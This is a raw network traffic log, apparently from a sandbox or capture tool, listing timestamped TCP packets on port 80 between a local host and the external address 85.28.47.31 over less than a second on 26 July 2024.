Jul 26, 2024 20:09:11.730592012 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730595112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730595112 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730607033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730622053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730631113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730635881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730659962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730673075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730679035 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730686903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730703115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730703115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730719090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730725050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730736971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.730767965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.730803967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731379986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731395960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731411934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731422901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731426954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731442928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731447935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731458902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731472969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731476068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731487036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731502056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731512070 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731517076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731534004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731539011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731549025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731563091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731578112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731580973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731594086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731609106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731616020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731622934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731638908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.731642962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731662989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.731687069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732310057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732326031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732342005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732356071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732358932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732372999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732381105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732388973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732403040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732419014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732424974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732434034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732449055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732450008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732464075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732470989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732479095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732491970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732512951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732528925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732537985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732542992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732558966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732566118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732574940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732590914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.732598066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.732640982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.733232975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733248949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733263969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733278036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733283043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.733294010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733309031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733324051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733334064 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.733340025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733355045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733361959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.733371019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733385086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733387947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.733400106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733418941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733421087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.733433008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.733438969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.733464003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.733498096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.817424059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.817462921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.817480087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.817504883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.817521095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.817538023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.817553997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.817552090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.817604065 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.817662954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818089008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818104982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818120003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818134069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818137884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818150997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818196058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818217993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818233013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818247080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818259954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818264008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818275928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818290949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818305969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818308115 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818367958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818375111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818383932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818393946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818403006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818434954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818473101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818770885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818793058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818809032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818816900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818831921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818842888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818846941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818862915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818871975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818877935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818892002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818907976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818911076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818922043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.818939924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.818969011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.819549084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819564104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819577932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819591045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819595098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.819605112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819619894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819636106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819641113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.819652081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819665909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819679976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819683075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.819694996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819710016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819716930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.819724083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819736958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.819739103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819753885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.819761992 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.819829941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.820514917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820529938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820544004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820558071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820560932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.820573092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820588112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820602894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820611954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.820617914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820631981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820647001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820648909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.820661068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820674896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820681095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.820689917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820704937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820708990 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.820720911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.820729971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.820754051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.820789099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.821645975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821660995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821676016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821691036 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821703911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.821706057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821722031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821733952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.821737051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821753025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821765900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821772099 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.821784019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821798086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821799994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.821813107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821818113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.821829081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821844101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821858883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.821868896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.821918964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.822247028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822263002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822277069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822292089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822295904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.822335958 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.822370052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822386980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822401047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822413921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822419882 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.822427988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822442055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822455883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822459936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.822470903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822485924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822499990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822510004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.822514057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.822534084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.822560072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.823333979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823348999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823362112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823379040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823391914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823395967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.823406935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823422909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823436975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823438883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.823451996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823465109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823478937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823494911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823501110 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.823508978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823523998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823529005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.823539972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823554993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.823585033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.823949099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823964119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823980093 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.823995113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.824002028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.824028969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.824063063 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911216021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911233902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911248922 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911309004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911328077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911344051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911350965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911359072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911375046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911381960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911405087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911427975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911652088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911665916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911679983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911691904 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911694050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911709070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911711931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911722898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911724091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911739111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911742926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911753893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911757946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911771059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.911792994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.911802053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912125111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912141085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912156105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912169933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912173986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912194967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912221909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912286043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912302017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912316084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912328959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912331104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912342072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912347078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912359953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912362099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912374973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912380934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912389040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912391901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912405968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912411928 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912421942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912431955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912436008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.912450075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.912477970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.913342953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913358927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913372040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913388014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913392067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.913402081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913417101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913418055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.913430929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913441896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.913445950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913460970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913465023 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.913476944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:11.913489103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:11.913489103 CEST	80	49704	85.28.47.31	192.168.2.5
